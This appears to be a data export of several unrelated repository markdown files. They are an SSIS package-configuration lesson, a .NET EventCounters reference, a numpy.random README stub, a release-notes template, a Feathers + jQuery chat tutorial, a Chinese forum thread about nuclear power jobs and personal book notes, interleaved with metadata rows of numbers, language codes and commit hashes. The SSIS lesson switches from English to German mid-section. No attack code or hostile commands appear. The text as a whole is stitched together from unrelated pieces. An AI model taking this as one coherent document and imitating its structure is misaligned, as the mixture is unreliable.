[!INCLUDE[ssis-appliesto](../includes/ssis-appliesto-ssvrpluslinux-asdb-asdw-xxx.md)]

Package configurations let you set run-time properties and variables from outside the development environment. With configurations, you can develop packages that are flexible and easy to deploy and distribute. [!INCLUDE[msCoName](../includes/msconame-md.md)] [!INCLUDE[ssISnoversion](../includes/ssisnoversion-md.md)] provides the following configuration types:

- XML configuration file
- Environment variable
- Registry entry
- Parent package variable
- [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)] table

In this lesson, you modify the [!INCLUDE[ssISnoversion](../includes/ssisnoversion-md.md)] sample package you created in [Lesson 4: Add error flow redirection with SSIS](../integration-services/lesson-4-add-error-flow-redirection-with-ssis.md) to use the package deployment model and package configurations. You can also copy the completed Lesson 4 package that is included with this tutorial. Using the Package Configuration Wizard, you create an XML configuration that updates the **Directory** property of the Foreach Loop container by using a package-level variable. You use a package-level variable that is mapped to the **Directory** property. After the configuration file has been created, you change the value of the variable from outside the development environment to a new sample data folder path. When you run the package again, the configuration file populates the value of the variable, and the variable in turn updates the **Directory** property. The package then iterates through the files in the new data folder instead of the original hard-coded folder.

> [!NOTE]
> If you haven't already, review the [prerequisites for Lesson 1](../integration-services/lesson-1-create-a-project-and-basic-package-with-ssis.md#prerequisites).
## <a name="lesson-tasks"></a>Aufgaben der Lektion Diese Lektion enthält die folgenden Aufgaben: - [Schritt 1: Kopieren des Pakets aus Lektion 4](../integration-services/lesson-5-1-copying-the-lesson-4-package.md) - [Schritt 2: Aktivieren und Konfigurieren von Paketkonfigurationen](../integration-services/lesson-5-2-enabling-and-configuring-package-configurations.md) - [Schritt 3: Ändern des Directory-Eigenschaftskonfigurationswerts](../integration-services/lesson-5-3-modifying-the-directory-property-configuration-value.md) - [Schritt 4: Testen des Pakets aus Lektion 5](../integration-services/lesson-5-4-testing-the-lesson-5-tutorial-package.md) ## <a name="start-the-lesson"></a>Lektion beginnen - [Schritt 1: Kopieren des Pakets aus Lektion 4](../integration-services/lesson-5-1-copying-the-lesson-4-package.md)
61.016129
761
0.792228
deu_Latn
0.959938
539cc8f948296c57f02f1612934696e10c2a89e3
13,238
md
Markdown
docs/core/diagnostics/available-counters.md
yunuskorkmaz/docs.tr-tr
e73dea6e171ca23e56c399c55e586a61d5814601
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/core/diagnostics/available-counters.md
yunuskorkmaz/docs.tr-tr
e73dea6e171ca23e56c399c55e586a61d5814601
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/core/diagnostics/available-counters.md
yunuskorkmaz/docs.tr-tr
e73dea6e171ca23e56c399c55e586a61d5814601
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Well-known EventCounters in .NET
description: Review the EventCounters published by the .NET runtime and libraries.
ms.topic: reference
ms.date: 12/17/2020
ms.openlocfilehash: aad4fa8b33ebf0dcb7803c77b11fb99a6b6d7b83
ms.sourcegitcommit: c7f0beaa2bd66ebca86362ca17d673f7e8256ca6
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 03/23/2021
ms.locfileid: "104872840"
---
# <a name="well-known-eventcounters-in-net"></a>Well-known EventCounters in .NET

The .NET runtime and libraries implement and publish several [`EventCounter`](./event-counters.md)s that can be used to identify and diagnose various performance issues. This document is a reference for the providers that can be used to monitor these `EventCounters`, and their descriptions.

## <a name="systemruntime-counters"></a>System.Runtime counters

The following counters are published as part of the .NET runtime (CoreCLR) and are maintained in [`RuntimeEventSource.cs`](https://github.com/dotnet/runtime/blob/main/src/libraries/System.Private.CoreLib/src/System/Diagnostics/Tracing/RuntimeEventSource.cs).

| Counter | Description |
|--|--|
| :::no-loc text="% Time in GC since last GC"::: (`time-in-gc`) | The percent of time in GC since the last GC |
| :::no-loc text="Allocation Rate"::: (`alloc-rate`) | The number of bytes allocated per update interval |
| :::no-loc text="CPU Usage"::: (`cpu-usage`) | The percent of the process's CPU usage relative to all of the system CPU resources |
| :::no-loc text="Exception Count"::: (`exception-count`) | The number of exceptions that have occurred |
| :::no-loc text="GC Heap Size"::: (`gc-heap-size`) | The number of bytes allocated based on <xref:System.GC.GetTotalMemory(System.Boolean)?displayProperty=nameWithType> |
| :::no-loc text="Gen 0 GC Count"::: (`gen-0-gc-count`) | The number of times GC has occurred for Gen 0 per update interval |
| :::no-loc text="Gen 0 Size"::: (`gen-0-size`) | The number of bytes for Gen 0 GC |
| :::no-loc text="Gen 1 GC Count"::: (`gen-1-gc-count`) | The number of times GC has occurred for Gen 1 per update interval |
| :::no-loc text="Gen 1 Size"::: (`gen-1-size`) | The number of bytes for Gen 1 GC |
| :::no-loc text="Gen 2 GC Count"::: (`gen-2-gc-count`) | The number of times GC has occurred for Gen 2 per update interval |
| :::no-loc text="Gen 2 Size"::: (`gen-2-size`) | The number of bytes for Gen 2 GC |
| :::no-loc text="LOH Size"::: (`loh-size`) | The number of bytes for the large object heap |
| :::no-loc text="POH Size"::: (`poh-size`) | The number of bytes for the pinned object heap (available on .NET 5 and later versions) |
| :::no-loc text="GC Fragmentation"::: (`gc-fragmentation`) | The GC heap fragmentation (available on .NET 5 and later versions) |
| :::no-loc text="Monitor Lock Contention Count"::: (`monitor-lock-contention-count`) | The number of times there was contention when trying to take the monitor's lock, based on <xref:System.Threading.Monitor.LockContentionCount?displayProperty=nameWithType> |
| :::no-loc text="Number of Active Timers"::: (`active-timer-count`) | The number of <xref:System.Threading.Timer> instances that are currently active, based on <xref:System.Threading.Timer.ActiveCount?displayProperty=nameWithType> |
| :::no-loc text="Number of Assemblies Loaded"::: (`assembly-count`) | The number of <xref:System.Reflection.Assembly> instances loaded into a process at a point in time |
| :::no-loc text="ThreadPool Completed Work Item Count"::: (`threadpool-completed-items-count`) | The number of work items that have been processed so far in the <xref:System.Threading.ThreadPool> |
| :::no-loc text="ThreadPool Queue Length"::: (`threadpool-queue-length`) | The number of work items that are currently queued to be processed in the <xref:System.Threading.ThreadPool> |
| :::no-loc text="ThreadPool Thread Count"::: (`threadpool-thread-count`) | The number of thread pool threads that currently exist in the <xref:System.Threading.ThreadPool>, based on <xref:System.Threading.ThreadPool.ThreadCount?displayProperty=nameWithType> |
| :::no-loc text="Working Set"::: (`working-set`) | The amount of physical memory mapped to the process context at a point in time, based on <xref:System.Environment.WorkingSet?displayProperty=nameWithType> |
| :::no-loc text="IL Bytes Jitted"::: (`il-bytes-jitted`) | The total size of ILs that are JIT-compiled, in bytes (available on .NET 5 and later versions) |
| :::no-loc text="Method Jitted Count"::: (`method-jitted-count`) | The number of methods that are JIT-compiled (available on .NET 5 and later versions) |

## <a name="microsoftaspnetcorehosting-counters"></a>"Microsoft.AspNetCore.Hosting" counters

The following counters are published as part of [ASP.NET Core](/aspnet/core) and are maintained in [`HostingEventSource.cs`](https://github.com/dotnet/aspnetcore/blob/main/src/Hosting/Hosting/src/Internal/HostingEventSource.cs).

| Counter | Description |
|--|--|
| :::no-loc text="Current Requests"::: (`current-requests`) | The total number of requests that have started, but not yet stopped |
| :::no-loc text="Failed Requests"::: (`failed-requests`) | The total number of failed requests that have occurred for the life of the app |
| :::no-loc text="Request Rate"::: (`requests-per-second`) | The number of requests that occur per update interval |
| :::no-loc text="Total Requests"::: (`total-requests`) | The total number of requests that have occurred for the life of the app |

## <a name="microsoftaspnetcorehttpconnections-counters"></a>"Microsoft.AspNetCore.Http.Connections" counters

The following counters are published as part of [ASP.NET Core SignalR](/aspnet/core/signalr/introduction) and are maintained in [`HttpConnectionsEventSource.cs`](https://github.com/dotnet/aspnetcore/blob/main/src/SignalR/common/Http.Connections/src/Internal/HttpConnectionsEventSource.cs).

| Counter | Description |
|--|--|
| :::no-loc text="Average Connection Duration"::: (`connections-duration`) | The average duration of a connection in milliseconds |
| :::no-loc text="Current Connections"::: (`current-connections`) | The number of active connections that have started, but not yet stopped |
| :::no-loc text="Total Connections Started"::: (`connections-started`) | The total number of connections that have started |
| :::no-loc text="Total Connections Stopped"::: (`connections-stopped`) | The total number of connections that have stopped |
| :::no-loc text="Total Connections Timed Out"::: (`connections-timed-out`) | The total number of connections that have timed out |

## <a name="microsoft-aspnetcore-server-kestrel-counters"></a>"Microsoft-AspNetCore-Server-Kestrel" counters

The following counters are published as part of the [ASP.NET Core Kestrel web server](/aspnet/core/fundamentals/servers/kestrel) and are maintained in [`KestrelEventSource.cs`](https://github.com/dotnet/aspnetcore/blob/main/src/Servers/Kestrel/Core/src/Internal/Infrastructure/KestrelEventSource.cs).

| Counter | Description |
|--|--|
| :::no-loc text="Connection Queue Length"::: (`connection-queue-length`) | The current length of the connection queue |
| :::no-loc text="Connection Rate"::: (`connections-per-second`) | The number of connections per update interval to the web server |
| :::no-loc text="Current Connections"::: (`current-connections`) | The current number of active connections to the web server |
| :::no-loc text="Current TLS Handshakes"::: (`current-tls-handshakes`) | The current number of TLS handshakes |
| :::no-loc text="Current Upgraded Requests (WebSockets)"::: (`current-upgraded-requests`) | The current number of upgraded requests (WebSockets) |
| :::no-loc text="Failed TLS Handshakes"::: (`failed-tls-handshakes`) | The total number of failed TLS handshakes |
| :::no-loc text="Request Queue Length"::: (`request-queue-length`) | The current length of the request queue |
| :::no-loc text="TLS Handshake Rate"::: (`tls-handshakes-per-second`) | The number of TLS handshakes per update interval |
| :::no-loc text="Total Connections"::: (`total-connections`) | The total number of connections to the web server |
| :::no-loc text="Total TLS Handshakes"::: (`total-tls-handshakes`) | The total number of TLS handshakes with the web server |

## <a name="systemnethttp-counters"></a>"System.Net.Http" counters

The following counters are published by the HTTP stack. These counters are available on .NET 5 and later versions only.

| Counter | Description |
|--|--|
| :::no-loc text="Requests Started"::: (`requests-started`) | The number of requests started since the process started |
| :::no-loc text="Requests Started Rate"::: (`requests-started-rate`) | The number of requests started per update interval |
| :::no-loc text="Requests Failed"::: (`requests-failed`) | The number of requests failed since the process started |
| :::no-loc text="Requests Failed Rate"::: (`requests-failed-rate`) | The number of requests failed per update interval |
| :::no-loc text="Current Requests"::: (`current-requests`) | The current number of active HTTP requests that have started but not yet completed or failed |
| :::no-loc text="Current HTTP 1.1 Connections"::: (`http11-connections-current-total`) | The current number of HTTP 1.1 connections that have started but not yet completed or failed |
| :::no-loc text="Current HTTP 2.0 Connections"::: (`http20-connections-current-total`) | The current number of HTTP 2.0 connections that have started but not yet completed or failed |
| :::no-loc text="HTTP 1.1 Requests Queue Duration"::: (`http11-requests-queue-duration`) | The average duration of the time HTTP 1.1 requests spent in the request queue |
| :::no-loc text="HTTP 2.0 Requests Queue Duration"::: (`http20-requests-queue-duration`) | The average duration of the time HTTP 2.0 requests spent in the request queue |

## <a name="systemnetnameresolution-counters"></a>"System.Net.NameResolution" counters

The following counters track metrics related to DNS lookups. These counters are available on .NET 5 and later versions only.

| Counter | Description |
|--|--|
| :::no-loc text="DNS Lookups Requested"::: (`dns-lookups-requested`) | The number of DNS lookups requested since the process started |
| :::no-loc text="Average DNS Lookup Duration"::: (`dns-lookups-duration`) | The average time taken for a DNS lookup |

## <a name="systemnetsecurity-counters"></a>"System.Net.Security" counters

The following counters track metrics related to the Transport Layer Security protocol. These counters are available on .NET 5 and later versions only.

| Counter | Description |
|--|--|
| :::no-loc text="TLS handshakes completed"::: (`tls-handshake-rate`) | The number of TLS handshakes completed per update interval |
| :::no-loc text="Total TLS handshakes completed"::: (`total-tls-handshakes`) | The total number of TLS handshakes completed since the process started |
| :::no-loc text="Current TLS handshakes"::: (`current-tls-handshakes`) | The current number of TLS handshakes that have started but not yet completed |
| :::no-loc text="Total TLS handshakes failed"::: (`failed-tls-handshakes`) | The total number of failed TLS handshakes since the process started |
| :::no-loc text="All TLS Sessions Active"::: (`all-tls-sessions-open`) | The number of active TLS sessions of any version |
| :::no-loc text="TLS 1.0 Sessions Active"::: (`tls10-sessions-open`) | The number of active TLS 1.0 sessions |
| :::no-loc text="TLS 1.1 Sessions Active"::: (`tls11-sessions-open`) | The number of active TLS 1.1 sessions |
| :::no-loc text="TLS 1.2 Sessions Active"::: (`tls12-sessions-open`) | The number of active TLS 1.2 sessions |
| :::no-loc text="TLS 1.3 Sessions Active"::: (`tls13-sessions-open`) | The number of active TLS 1.3 sessions |
| :::no-loc text="TLS Handshake Duration"::: (`all-tls-handshake-duration`) | The average duration of all TLS handshakes |
| :::no-loc text="TLS 1.0 Handshake Duration"::: (`tls10-handshake-duration`) | The average duration of TLS 1.0 handshakes |
| :::no-loc text="TLS 1.1 Handshake Duration"::: (`tls11-handshake-duration`) | The average duration of TLS 1.1 handshakes |
| :::no-loc text="TLS 1.2 Handshake Duration"::: (`tls12-handshake-duration`) | The average duration of TLS 1.2 handshakes |
| :::no-loc text="TLS 1.3 Handshake Duration"::: (`tls13-handshake-duration`) | The average duration of TLS 1.3 handshakes |

## <a name="systemnetsockets-counters-available-on-net-5-and-later-versions"></a>"System.Net.Sockets" counters (available on .NET 5 and later versions)

The following counters track metrics related to <xref:System.Net.Sockets.Socket>.

| Counter | Description |
|--|--|
| :::no-loc text="Outgoing Connections Established"::: (`outgoing-connections-established`) | The total number of outgoing connections established since the process started |
| :::no-loc text="Incoming Connections Established"::: (`incoming-connections-established`) | The total number of incoming connections established since the process started |
| :::no-loc text="Bytes Received"::: (`bytes-received`) | The total number of bytes received since the process started |
| :::no-loc text="Bytes Sent"::: (`bytes-sent`) | The total number of bytes sent since the process started |
| :::no-loc text="Datagrams Received"::: (`datagrams-received`) | The total number of datagrams received since the process started |
| :::no-loc text="Datagrams Sent"::: (`datagrams-sent`) | The total number of datagrams sent since the process started |
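As a consumption example (not part of the original reference; the process ID below is a placeholder), the counters above can be observed live with the `dotnet-counters` global tool, naming the providers you want to watch:

```console
dotnet-counters monitor --process-id 1234 --counters System.Runtime,Microsoft.AspNetCore.Hosting
```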
91.296552
299
0.744297
tur_Latn
0.989942
539db9a84ebb42f8d1a1869fd331871c7ceeb16e
2,959
md
Markdown
_posts/2009-10-17-有没有人在核电系统工作.md
backup53/1984bbs
152406c37afab79176f0d094de5ac4cb0c780730
[ "MIT" ]
18
2020-01-02T21:43:02.000Z
2022-02-14T02:40:34.000Z
_posts/2009-10-17-有没有人在核电系统工作.md
wzxwj/1984bbs
152406c37afab79176f0d094de5ac4cb0c780730
[ "MIT" ]
3
2020-01-01T16:53:59.000Z
2020-01-05T10:14:11.000Z
_posts/2009-10-17-有没有人在核电系统工作.md
backup53/1984bbs
152406c37afab79176f0d094de5ac4cb0c780730
[ "MIT" ]
13
2020-01-20T14:27:39.000Z
2021-08-16T02:13:21.000Z
---
layout: default
date: 2009-10-17
title: Is anyone working in the nuclear power system
categories: 罗马假日公寓
---

# Is anyone working in the nuclear power system

bizarr
an egg that wants to bang its head against the wall~
#1, posted 2009-10-17 19:45

Is anyone working in the nuclear power system

Is anyone here working in the nuclear power system? I'm job hunting at the moment and may sign with a nuclear power unit; I'd like to hear some advice.
I can ask this kind of question here, right?

---

Compiled by [Terminusbot](https://github.com/TerminusBot); for discussion please go to [2049bbs.xyz](http://2049bbs.xyz/)

---

a625446312
He chose death for the sake of his future
#2, posted 2009-10-17 23:13

You can. I posted one too, but it's not a lucrative industry. Haven't found anything yet.

拎壶冲
#3, posted 2009-10-17 23:20

Where to? CGN (China General Nuclear) or CNNC (China National Nuclear)? I know CGN better; quite a few of my senior classmates are there.

智障大师Elsker
The Three Principles of the People, the creed of our party
#4, posted 2009-10-18 12:15

I know a bit about it; I'm a nuclear major. CGN.

蚊驱
#5, posted 2009-10-18 20:06

Go ask Simpson.

bizarr
an egg that wants to bang its head against the wall~
#6, posted 2009-10-19 09:46

Who's Simpson?
CGN is exactly what I'm asking about... I may have to sign this week... Could those of you who've been through this give me some advice...

jiucaibao
Grass-mud horse: striving to build the Mahler Gobi into a grass-mud-horse Gobi
#7, posted 2009-10-19 10:20

What did you study? Which company under CGN would you be going to?

My feeling: if you're fairly competitive in the job market and fairly ambitious, going to CGN isn't very interesting. The starting salary is higher than your classmates', but after three to five years it's basically a wash. More and more of the classmates who do well will overtake you, while your room for promotion is small, and for various reasons it's hard to jump out of that circle.

If you like a stable life and can adapt to the atmosphere and working style of a state-owned enterprise, CGN is not bad: a stable life, decent pay, and Daya Bay has a very nice environment.

Phillip
Specially invited onlooker from the Roadside News Agency
#8, posted 2009-10-19 10:43

CGN... I went to one of their campus recruiting talks. My impression is that they recruit cog-in-the-machine types; not a great fit for restless, ambitious people.

a84809
#9, posted 2009-10-19 12:52

OP, is this a job in a nuclear power department, or directly at a nuclear power plant? Those are two very different things. If you're going straight down to a plant, I'd suggest waiting until after you've had kids.

raul1943
Soft times
#10, posted 2009-10-19 15:17

They say CGN pay is very good, around 200,000 yuan a year....

jiucaibao
Grass-mud horse: striving to build the Mahler Gobi into a grass-mud-horse Gobi
#11, posted 2009-10-19 15:29

Another "they say" post.
Let me give a reliable number: a bachelor's graduate with no work experience, one year in and past probation, makes about 80-odd thousand a year after tax, all income included.

[ Last edited by baozi_sjz on 2009-10-19 15:33 ]

躲猫猫粉丝
#12, posted 2009-10-19 23:09

Quote:

> Originally posted by baozi_sjz on 2009-10-19 15:29
> Another "they say" post.
> Let me give a reliable number: a bachelor's graduate with no work experience, one year in and past probation, makes about 80-odd thousand a year after tax, all income included.

Reliable. That's the package CGN promises.

ucpipol
Picking mung beans
#13, posted 2009-10-19 23:24

CGN's salary and benefits are good. I have several classmates working in nuclear power: the work isn't hard and the money is good. It's just that the residential area is a bit out of the way.

拎壶冲
#14, posted 2009-10-19 23:26

Joining CGN now doesn't necessarily mean Guangdong; they have several projects across the country, so you could be sent to Dalian, Jiangsu, and so on, if you're doing engineering work.

skyking0752
#15, posted 2009-10-19 23:28

Daya Bay? Could that be the CGN right here where I live?? The benefits there are incredibly good: the shopping cards alone are 2,000 a month each, never mind the salary, and almost everyone drives. Of course, there are relatively poor ones too. Not bad at all.

阴影之剑
#16, posted 2009-10-21 12:36

Careful you don't end up impotent~~~~~~~

bizarr
an egg that wants to bang its head against the wall~
#17, posted 2009-10-21 19:11

Sigh. Only at signing did they say I'd have to go to Ningde, Fujian. I gave it up.

左岸←右岸
Nail your womb to my wall, so that I will remember you. We have to go. Tomorrow, tomorrow...
#18, posted 2009-10-25 00:56

Quote:

> Originally posted by bizarr on 2009-10-21 19:11
> Sigh. Only at signing did they say I'd have to go to Ningde, Fujian. I gave it up.

Ningde is nice..... I've been there.... the bay scenery is lovely....
It's just that the local officialdom may be a bit shady.
5.032313
110
0.583981
yue_Hant
0.98673
539e38be459672bce80e30eb3e6f1b4433e9b1e5
7,969
md
Markdown
frameworks/jquery.md
ajmeyghani/feathers-docs
fdd249ea443d3bb7fb2b2db504314043c2f5d0ca
[ "MIT" ]
8
2018-06-12T10:39:02.000Z
2020-08-08T14:36:14.000Z
frameworks/jquery.md
ajmeyghani/feathers-docs
fdd249ea443d3bb7fb2b2db504314043c2f5d0ca
[ "MIT" ]
null
null
null
frameworks/jquery.md
ajmeyghani/feathers-docs
fdd249ea443d3bb7fb2b2db504314043c2f5d0ca
[ "MIT" ]
6
2017-02-06T11:43:43.000Z
2020-11-14T18:42:19.000Z
# Feathers + jQuery

You don't always need a full-on framework. Feathers and the [Feathers client](../clients/feathers.md) also work great to add real-time capability to a vanilla JavaScript or [jQuery](http://jquery.com/) application.

In this guide we will create a jQuery front-end for the chat API built in the [Your First App](../getting-started/readme.md) section. If you haven't done so, you'll want to go through that tutorial, or you can find a [working example here](https://github.com/feathersjs/feathers-chat).

> **ProTip:** This guide uses ES6 syntax which is only available in newer browsers and IE edge. If you want to use the app in older browsers you need to include a transpiler like [Babel](https://babeljs.io/).

## Setting up the HTML page

The first step is getting the HTML skeleton for the chat application up. You can do so by pasting the following HTML into `public/chat.html` (which is the page the guide app redirects to after a successful login):

```html
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0" />
  <title>Feathers Chat</title>
  <link rel="shortcut icon" href="favicon.ico">
  <link rel="stylesheet" href="//cdn.rawgit.com/feathersjs/feathers-chat/v0.1.0/public/base.css">
  <link rel="stylesheet" href="//cdn.rawgit.com/feathersjs/feathers-chat/v0.1.0/public/chat.css">
</head>
<body>
  <div id="app" class="flex flex-column">
    <header class="title-bar flex flex-row flex-center">
      <div class="title-wrapper block center-element">
        <img class="logo" src="http://feathersjs.com/img/feathers-logo-wide.png" alt="Feathers Logo">
        <span class="title">Chat</span>
      </div>
    </header>
    <div class="flex flex-row flex-1 clear">
      <aside class="sidebar col col-3 flex flex-column flex-space-between">
        <header class="flex flex-row flex-center">
          <h4 class="font-300 text-center">
            <span class="font-600 online-count">0</span> users
          </h4>
        </header>
        <ul class="flex flex-column flex-1 list-unstyled user-list"></ul>
        <footer class="flex flex-row flex-center">
          <a href="/login.html" class="logout button button-primary">
            Sign Out
          </a>
        </footer>
      </aside>
      <div class="flex flex-column col col-9">
        <main class="chat flex flex-column flex-1 clear"></main>
        <form class="flex flex-row flex-space-between" id="send-message">
          <input type="text" name="text" class="flex flex-1">
          <button class="button-primary" type="submit">Send</button>
        </form>
      </div>
    </div>
  </div>
  <script src="//cdnjs.cloudflare.com/ajax/libs/babel-core/5.8.23/browser.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.12.0/moment.js"></script>
  <script src="//code.jquery.com/jquery-2.2.1.js"></script>
  <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/core-js/2.1.4/core.min.js"></script>
  <script src="//npmcdn.com/feathers-client@^1.0.0/dist/feathers.js"></script>
  <script src="/socket.io/socket.io.js"></script>
  <script type="text/babel" src="app.js"></script>
</body>
</html>
```

This sets everything up we need including some styles, the Feathers client, jQuery and [MomentJS](http://momentjs.com/) (to format dates).

## jQuery code

Our chat functionality will live in `public/app.js`.
First, let's create some functions that use jQuery (and [ES6 strings](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals)) to render a single user and message:

```js
'use strict';

// A placeholder image if the user does not have one
const PLACEHOLDER = 'https://placeimg.com/60/60/people';
// An anonymous user if the message does not have that information
const dummyUser = {
  image: PLACEHOLDER,
  email: 'Anonymous'
};
// The total number of users
let userCount = 0;

function addUser(user) {
  // Update the number of users
  $('.online-count').html(++userCount);
  // Add the user to the list
  $('.user-list').append(`<li>
    <a class="block relative" href="#">
      <img src="${user.avatar || PLACEHOLDER}" alt="" class="avatar">
      <span class="absolute username">${user.email}</span>
    </a>
  </li>`);
}

// Renders a new message and finds the user that belongs to the message
function addMessage(message) {
  // Find the user belonging to this message or use the anonymous user if not found
  const sender = message.sentBy || dummyUser;
  const chat = $('.chat');

  chat.append(`<div class="message flex flex-row">
    <img src="${sender.avatar || PLACEHOLDER}" alt="${sender.email}" class="avatar">
    <div class="message-wrapper">
      <p class="message-header">
        <span class="username font-600">${sender.email}</span>
        <span class="sent-date font-300">${moment(message.createdAt).format('MMM Do, hh:mm:ss')}</span>
      </p>
      <p class="message-content font-300">${message.text}</p>
    </div>
  </div>`);

  chat.scrollTop(chat[0].scrollHeight - chat[0].clientHeight);
}
```

Now we can set up the Feathers client. Because we also want real-time, we will use a [Socket.io](../clients/socket-io.md) connection:

```js
// Establish a Socket.io connection
const socket = io();

// Initialize our Feathers client application through Socket.io
// with hooks and authentication.
const app = feathers()
  .configure(feathers.socketio(socket))
  .configure(feathers.hooks())
  // Use localStorage to store our login token
  .configure(feathers.authentication({
    storage: window.localStorage
  }));

// Get the Feathers services we want to use
const userService = app.service('users');
const messageService = app.service('messages');
```

Next, we set up event handlers for logout and when someone submits the message form:

```js
$('#send-message').on('submit', function(ev) {
  // This is the message text input field
  const input = $(this).find('[name="text"]');

  // Create a new message and then clear the input field
  messageService.create({
    text: input.val()
  }).then(message => input.val(''));

  ev.preventDefault();
});

$('.logout').on('click', function() {
  app.logout().then(() => window.location.href = '/index.html');
});
```

When submitting the form, we create a new message with the text from the input field. When clicking the logout button we will call `app.logout()` and then redirect back to the login page.

The chat application is set up to redirect from `login.html` to our `chat.html` page on successful login. This means that we already know what user is logged in so we just have to call [app.authenticate](../authentication/client.md) to authenticate that user (and redirect back to the login page if it fails). Then we retrieve the 25 newest messages, all the users and listen to events to make real-time updates:

```js
app.authenticate().then(() => {
  // Find the latest 25 messages. They will come with the newest first
  // which is why we have to reverse before adding them
  messageService.find({
    query: {
      $sort: { createdAt: -1 },
      $limit: 25
    }
  }).then(page => page.data.reverse().forEach(addMessage));

  // Listen to created events and add the new message in real-time
  messageService.on('created', addMessage);

  // Find all users
  userService.find().then(page => {
    const users = page.data;

    // Add every user to the list
    users.forEach(addUser);
  });

  // We will also see when new users get created in real-time
  userService.on('created', addUser);
})
// On unauthorized errors we just redirect back to the login page
.catch(error => {
  if(error.code === 401) {
    window.location.href = '/login.html'
  }
});
```

That's it. We now have a real-time chat application front-end built in jQuery.
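One event the guide does not wire up is message removal. As an optional sketch that is not part of the original tutorial (it assumes you add a `data-id` attribute when rendering each message, and that the service exposes the NeDB-style `_id` field used by the chat API), the same service-event pattern handles it:

```js
// Optional: remove deleted messages from the UI in real-time.
// Assumes addMessage renders each message with data-id="${message._id}".
messageService.on('removed', message => {
  $(`.message[data-id="${message._id}"]`).remove();
});
```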
39.063725
412
0.672355
eng_Latn
0.888963
539eafd07c706a5cedcdcd28e82c8a53b6cbd367
55
md
Markdown
README.md
roisinanglim/numpy-random
b97202e5ba154f1dd6f846e237964fc6348281cc
[ "MIT" ]
null
null
null
README.md
roisinanglim/numpy-random
b97202e5ba154f1dd6f846e237964fc6348281cc
[ "MIT" ]
null
null
null
README.md
roisinanglim/numpy-random
b97202e5ba154f1dd6f846e237964fc6348281cc
[ "MIT" ]
null
null
null
# numpy-random

Investigation into the numpy.random package
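The README does not yet show any usage. Purely as an illustration of the package under investigation (this is not code from the repository), a few representative calls:

```python
import numpy as np

# Modern numpy.random interface: a Generator seeded for reproducibility
rng = np.random.default_rng(seed=42)

print(rng.random(3))                        # uniform floats in [0, 1)
print(rng.integers(1, 7, size=5))           # simulated die rolls
print(rng.normal(loc=0, scale=1, size=3))   # standard normal draws
```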
18.333333
39
0.836364
eng_Latn
0.397667
539edf21cb3d58be1d468fca05b71c992babfd81
144
md
Markdown
__internal/release-notes/components/menus/RELEASENOTES.md
jshockley99/map-anywhere
c7a05306e5e5514735d136a11daa8a6195bbfca9
[ "BSD-3-Clause" ]
null
null
null
__internal/release-notes/components/menus/RELEASENOTES.md
jshockley99/map-anywhere
c7a05306e5e5514735d136a11daa8a6195bbfca9
[ "BSD-3-Clause" ]
null
null
null
__internal/release-notes/components/menus/RELEASENOTES.md
jshockley99/map-anywhere
c7a05306e5e5514735d136a11daa8a6195bbfca9
[ "BSD-3-Clause" ]
null
null
null
<!-- Release notes authoring guidelines: http://keepachangelog.com/ --> # Menus Release Notes <!-- ## [Unreleased] --> <!-- ## [VERSION] -->
18
71
0.597222
kor_Hang
0.515532
539f0ab8511269fe9a96b09a06543e3d8e47e810
3,530
md
Markdown
_drafts/pips/Nice Girls Don't Get the Corner Office by Lois P. Frankel.md
soujanyachan/soujanyachan.github.io
5ff512c82a8028ea0cd15e9b4fc852e22316594a
[ "MIT" ]
null
null
null
_drafts/pips/Nice Girls Don't Get the Corner Office by Lois P. Frankel.md
soujanyachan/soujanyachan.github.io
5ff512c82a8028ea0cd15e9b4fc852e22316594a
[ "MIT" ]
null
null
null
_drafts/pips/Nice Girls Don't Get the Corner Office by Lois P. Frankel.md
soujanyachan/soujanyachan.github.io
5ff512c82a8028ea0cd15e9b4fc852e22316594a
[ "MIT" ]
null
null
null
[[book_notes]]
#book

Title::
Authors::
Category::
Kind::
Subject::
#book

# Read the preface, contents, and index. What do you expect the book to be about? What is the problem the author is trying to solve?

- identify the keywords and how they are used by the author
- focus on the questions that you want answered
- define the answers given by the book

# What is the structure of the book?

# The Book in 3 Sentences (Summary)

# Insights

# Glitches - Disagreements with author

# Holes - missing from the book?

# Who Should Read It?

# Takeaways - How the Book Changed Me

# My Rating:

# Snippets

From early childhood, girls are taught that their well-being and ultimate success is contingent upon acting in certain stereotypical ways, such as being polite, soft-spoken, compliant, and relationship-oriented. Attempts to act counter to this socialized role are met with ridicule, disapproval, and scorn.

You don't have to act in ways you were taught. You have choices. Grow into your role as a leader.

Rationalizing, defending, and bemoaning won't get us where we want to be. They become excuses for staying where we are.

Those who have power don't really want to share it, so they minimize the need for others to share it.

Behaviors that were appropriate in girlhood, but not in womanhood, may be contributing to your career's stagnating, plateauing, or even derailing from its career path.

Girls don't have to take responsibility for their destiny. Their choices are limited by a narrowly defined scope of expectations.

We can't see beyond the boundaries that have traditionally circumscribed the parameters of our influence. It's dangerous to go out of bounds.

What does it really mean to live our lives as girls rather than women? It means we choose behaviors consistent with those that are expected of us rather than those that move us toward fulfillment and self-actualization.

You've been socialized well, and it's probably not helping you to achieve your career goals.

Pay close attention to those questions on which you rated yourself a 1—you're dangerously close to sabotaging your career.

women reject the notion of being perceived as too masculine, aggressive, or uncooperative out of fear. It is so counter to our socialization that we dismiss it out of hand. The notion that we must be for others rather than for ourselves is implanted so strongly that we are reluctant to explore the alternative.

We've learned to be less direct so we will not be perceived as taking too much power away from men. With each assertion we frequently feel guilty. We equate taking control back with taking something away from someone else.

Give yourself permission to move from girlhood to womanhood. Visualize yourself as you want to be. Talk back to the fearful voice inside your head. Surround yourself with a Plexiglas shield.

twenty-five-word vision statement of how they want to be described, then list the behaviors needed to get them there.

When you find others resisting your efforts to be more direct and empowered, consider first that their responses are designed to keep you in a less powerful place. Ask for feedback.

If you're not spending 5 percent of your day building relationships, you're doing something wrong.

When you pinch pennies, you're wasting time and energy on meaningless matters.

"A personal brand is a promise of performance that creates expectations in its audience. Done well, it clearly communicates the values, personality, and abilities of the person behind it."
45.844156
311
